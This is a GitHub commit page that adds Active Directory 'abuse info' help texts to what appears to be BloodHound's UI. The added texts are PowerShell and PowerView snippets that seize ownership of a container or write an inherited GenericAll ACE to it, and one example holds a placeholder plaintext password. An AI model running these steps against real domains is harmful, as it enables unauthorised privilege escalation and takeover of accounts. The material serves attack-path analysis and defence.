Skip to content

Commit

Permalink
more abuse info (#889)
Browse files Browse the repository at this point in the history
  • Loading branch information
@JonasBK
JonasBK authored Sep 25, 2024
1 parent 9587786 commit 538513e
Show file tree
Hide file tree
Showing 6 changed files with 160 additions and 4 deletions.
10 changes: 9 additions & 1 deletion packages/javascript/bh-shared-ui/src/components/HelpTexts/Contains/Abuse.tsx
View file
Original file line number Diff line number Diff line change
Expand Up @@ -18,7 +18,15 @@ import { FC } from 'react';
import { Typography } from '@mui/material';

const Abuse: FC = () => {
return <Typography variant='body2'>There is no abuse info related to this edge.</Typography>;
return (
<>
<Typography variant='body2'>
Permissions on the parent of a child object may enable compromise of the child object through inherited
ACEs or linked GPOs.
</Typography>
<Typography variant='body2'>See the inbound edges on the parent object for details.</Typography>
</>
);
};

export default Abuse;
3 changes: 0 additions & 3 deletions packages/javascript/bh-shared-ui/src/components/HelpTexts/Contains/General.tsx
View file
Original file line number Diff line number Diff line change
Expand Up @@ -25,9 +25,6 @@ const General: FC<EdgeInfoProps> = ({ sourceName, sourceType, targetName, target
<Typography variant='body2'>
{typeFormat(sourceType)} {sourceName} contains the {typeFormat(targetType)} {targetName}.
</Typography>
<Typography variant='body2'>
GPOs linked to a container apply to all objects that are contained by the container.
</Typography>
</>
);
};
Expand Down
32 changes: 32 additions & 0 deletions packages/javascript/bh-shared-ui/src/components/HelpTexts/GenericAll/WindowsAbuse.tsx
View file
Original file line number Diff line number Diff line change
Expand Up @@ -17,6 +17,7 @@
import { FC } from 'react';
import { Link, Typography } from '@mui/material';
import { EdgeInfoProps } from '../index';
import CodeController from '../CodeController/CodeController';

const WindowsAbuse: FC<EdgeInfoProps & { targetId: string; haslaps: boolean }> = ({
sourceName,
Expand Down Expand Up @@ -699,6 +700,37 @@ const WindowsAbuse: FC<EdgeInfoProps & { targetId: string; haslaps: boolean }> =
</Typography>
</>
);
case 'Container':
return (
<>
<Typography variant='body2'>
With full control of the container, you may add a new ACE on the container that will inherit
down to the objects under that container.
</Typography>
<Typography variant='body2'>This can be done with PowerShell:</Typography>
<CodeController>
{`$containerDN = "CN=USERS,DC=DUMPSTER,DC=FIRE"
$principalName = "principal" # SAM account name of principal
# Find the certificate template
$template = [ADSI]"LDAP://$containerDN"
# Construct the ACE
$account = New-Object System.Security.Principal.NTAccount($principalName)
$sid = $account.Translate([System.Security.Principal.SecurityIdentifier])
$ace = New-Object DirectoryServices.ActiveDirectoryAccessRule(
$sid,
[System.DirectoryServices.ActiveDirectoryRights]::GenericAll,
[System.Security.AccessControl.AccessControlType]::Allow,
[System.DirectoryServices.ActiveDirectorySecurityInheritance]::Descendents
)
# Add the new ACE to the ACL
$acl = $template.psbase.ObjectSecurity
$acl.AddAccessRule($ace)
$template.psbase.CommitChanges()`}
</CodeController>
</>
);
case 'CertTemplate':
return (
<>
Expand Down
32 changes: 32 additions & 0 deletions packages/javascript/bh-shared-ui/src/components/HelpTexts/Owns/WindowsAbuse.tsx
View file
Original file line number Diff line number Diff line change
Expand Up @@ -17,6 +17,7 @@
import { FC } from 'react';
import { Link, Typography } from '@mui/material';
import { EdgeInfoProps } from '../index';
import CodeController from '../CodeController/CodeController';

const WindowsAbuse: FC<EdgeInfoProps & { targetId: string; haslaps: boolean }> = ({
sourceName,
Expand Down Expand Up @@ -921,6 +922,37 @@ const WindowsAbuse: FC<EdgeInfoProps & { targetId: string; haslaps: boolean }> =
</Typography>
</>
);
case 'Container':
return (
<>
<Typography variant='body2'>
With ownership of the container object, you may grant yourself the GenericAll permission
inherited to child objects.
</Typography>
<Typography variant='body2'>This can be done with PowerShell:</Typography>
<CodeController>
{`$containerDN = "CN=USERS,DC=DUMPSTER,DC=FIRE"
$principalName = "principal" # SAM account name of principal
# Find the certificate template
$template = [ADSI]"LDAP://$containerDN"
# Construct the ACE
$account = New-Object System.Security.Principal.NTAccount($principalName)
$sid = $account.Translate([System.Security.Principal.SecurityIdentifier])
$ace = New-Object DirectoryServices.ActiveDirectoryAccessRule(
$sid,
[System.DirectoryServices.ActiveDirectoryRights]::GenericAll,
[System.Security.AccessControl.AccessControlType]::Allow,
[System.DirectoryServices.ActiveDirectorySecurityInheritance]::Descendents
)
# Add the new ACE to the ACL
$acl = $template.psbase.ObjectSecurity
$acl.AddAccessRule($ace)
$template.psbase.CommitChanges()`}
</CodeController>
</>
);
case 'CertTemplate':
return (
<>
Expand Down
32 changes: 32 additions & 0 deletions packages/javascript/bh-shared-ui/src/components/HelpTexts/WriteDacl/WindowsAbuse.tsx
View file
Original file line number Diff line number Diff line change
Expand Up @@ -17,6 +17,7 @@
import { FC } from 'react';
import { Link, Typography } from '@mui/material';
import { EdgeInfoProps } from '../index';
import CodeController from '../CodeController/CodeController';

const WindowsAbuse: FC<EdgeInfoProps & { targetId: string; haslaps: boolean }> = ({
sourceName,
Expand Down Expand Up @@ -864,6 +865,37 @@ const WindowsAbuse: FC<EdgeInfoProps & { targetId: string; haslaps: boolean }> =
</Typography>
</>
);
case 'Container':
return (
<>
<Typography variant='body2'>
With WriteDacl on the container object, you may grant yourself the GenericAll permission
inherited to child objects.
</Typography>
<Typography variant='body2'>This can be done with PowerShell:</Typography>
<CodeController>
{`$containerDN = "CN=USERS,DC=DUMPSTER,DC=FIRE"
$principalName = "principal" # SAM account name of principal
# Find the certificate template
$template = [ADSI]"LDAP://$containerDN"
# Construct the ACE
$account = New-Object System.Security.Principal.NTAccount($principalName)
$sid = $account.Translate([System.Security.Principal.SecurityIdentifier])
$ace = New-Object DirectoryServices.ActiveDirectoryAccessRule(
$sid,
[System.DirectoryServices.ActiveDirectoryRights]::GenericAll,
[System.Security.AccessControl.AccessControlType]::Allow,
[System.DirectoryServices.ActiveDirectorySecurityInheritance]::Descendents
)
# Add the new ACE to the ACL
$acl = $template.psbase.ObjectSecurity
$acl.AddAccessRule($ace)
$template.psbase.CommitChanges()`}
</CodeController>
</>
);
case 'CertTemplate':
return (
<>
Expand Down
55 changes: 55 additions & 0 deletions packages/javascript/bh-shared-ui/src/components/HelpTexts/WriteOwner/WindowsAbuse.tsx
View file
Original file line number Diff line number Diff line change
Expand Up @@ -17,6 +17,7 @@
import { FC } from 'react';
import { Link, Typography } from '@mui/material';
import { EdgeInfoProps } from '../index';
import CodeController from '../CodeController/CodeController';

const WindowsAbuse: FC<EdgeInfoProps & { targetId: string; haslaps: boolean }> = ({
sourceName,
Expand Down Expand Up @@ -1019,6 +1020,60 @@ const WindowsAbuse: FC<EdgeInfoProps & { targetId: string; haslaps: boolean }> =
</Typography>
</>
);
case 'Container':
return (
<>
<Typography variant='body2'>
To change the ownership of the object, you may use the Set-DomainObjectOwner function in
PowerView.
</Typography>
<Typography variant='body2'>
You may need to authenticate to the Domain Controller as{' '}
{sourceType === 'User'
? `${sourceName} if you are not running a process as that user`
: `a member of ${sourceName} if you are not running a process as a member`}
. To do this in conjunction with Set-DomainObjectOwner, first create a PSCredential object
(these examples comes from the PowerView help documentation):
</Typography>
<Typography component={'pre'}>
{"$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force\n" +
"$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\\dfm.a', $SecPassword)"}
</Typography>
<Typography variant='body2'>
Then, use Set-DomainObjectOwner, optionally specifying $Cred if you are not already running a
process as a member of (the group that holds this ACE):
</Typography>
<Typography component={'pre'}>
{'Set-DomainObjectOwner -Credential $Cred -TargetIdentity dfm -OwnerIdentity harmj0y'}
</Typography>
<Typography variant='body2'>
Now with ownership of the container object, you may grant yourself the GenericAll permission
inherited to child objects.
</Typography>
<Typography variant='body2'>This can be done with PowerShell:</Typography>
<CodeController>
{`$containerDN = "CN=USERS,DC=DUMPSTER,DC=FIRE"
$principalName = "principal" # SAM account name of principal
# Find the certificate template
$template = [ADSI]"LDAP://$containerDN"
# Construct the ACE
$account = New-Object System.Security.Principal.NTAccount($principalName)
$sid = $account.Translate([System.Security.Principal.SecurityIdentifier])
$ace = New-Object DirectoryServices.ActiveDirectoryAccessRule(
$sid,
[System.DirectoryServices.ActiveDirectoryRights]::GenericAll,
[System.Security.AccessControl.AccessControlType]::Allow,
[System.DirectoryServices.ActiveDirectorySecurityInheritance]::Descendents
)
# Add the new ACE to the ACL
$acl = $template.psbase.ObjectSecurity
$acl.AddAccessRule($ace)
$template.psbase.CommitChanges()`}
</CodeController>
</>
);
case 'CertTemplate':
return (
<>
Expand Down

0 comments on commit 538513e

Please sign in to comment.